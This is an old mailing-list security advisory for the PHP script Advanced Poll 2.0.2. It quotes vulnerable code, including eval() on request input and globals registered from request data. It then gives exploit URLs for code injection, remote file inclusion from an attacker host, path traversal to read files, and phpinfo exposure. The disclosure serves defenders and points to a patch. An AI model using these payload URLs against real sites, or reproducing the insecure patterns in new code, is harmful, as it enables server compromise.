<<< Date Index >>>     <<< Thread Index >>>

Advanced Poll : PHP Code Injection, File Include, Phpinfo



Informations :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

comments.php :

------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");

for ($i=0;$i<sizeof($register_poll_vars);$i++) {
   if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] = \"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
   } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] = \"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
   } else {
       eval("\$$register_poll_vars[$i] = '';");
   }
}
[...]
------------------------------------------------------------------------------------------------------



booth.php, png.php :

---------------------------------------------------------------
<?php

$include_path = dirname(__FILE__);
if ($include_path == "/") {
   $include_path = ".";
}

if (!isset($PHP_SELF)) {
   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
   $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
   if (isset($HTTP_GET_VARS)) {
       while (list($name, $value)=each($HTTP_GET_VARS)) {
           $$name=$value;
       }
   }
   if (isset($HTTP_POST_VARS)) {
       while (list($name, $value)=each($HTTP_POST_VARS)) {
           $$name=$value;
       }
   }
   if(isset($HTTP_COOKIE_VARS)){
       while (list($name, $value)=each($HTTP_COOKIE_VARS)){
           $$name=$value;
       }
   }
}

require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------


poll_ssi.php, popup.php :

----------------------
include "./booth.php";
----------------------




admin/common.inc.php :

---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
   $PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
   if (isset($HTTP_GET_VARS)) {
       while (list($name, $value)=each($HTTP_GET_VARS)) {
           $$name=$value;
       }
   }
   if (isset($HTTP_POST_VARS)) {
       while (list($name, $value)=each($HTTP_POST_VARS)) {
           $$name=$value;
       }
   }
   if(isset($HTTP_COOKIE_VARS)){
       while (list($name, $value)=each($HTTP_COOKIE_VARS)){
           $$name=$value;
       }
   }
}

$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
   include ("$base_path/lang/$pollvars[lang]");
} else {
   include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------


In the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

:

------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);

require "./common.inc.php";
[...]
------------------------------------


misc/info.php :

-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------


Exploits :
°°°°°°°°

- if magic_quotes_gpc=OFF :

http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//

or with a POST form or cookies.

- This will only work if register_globals=OFF (this is not an error...) :

http://[target]/booth.php?include_path=http://[attacker] (or with png.php, poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php

- This will work if register_globals=OFF OR ON :

http://[target]/admin/common.inc.php?basepath=http://[attacker] will include the file http://[attacker]/lang/english.php.

The same hole can be found, in the /admin/ directory, in the files :

- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php

but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view will include the file http://[target]/admin/../../../file/to/view


- http://[target]/misc/info.php will show the phpinfo().


Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .


Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info

_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail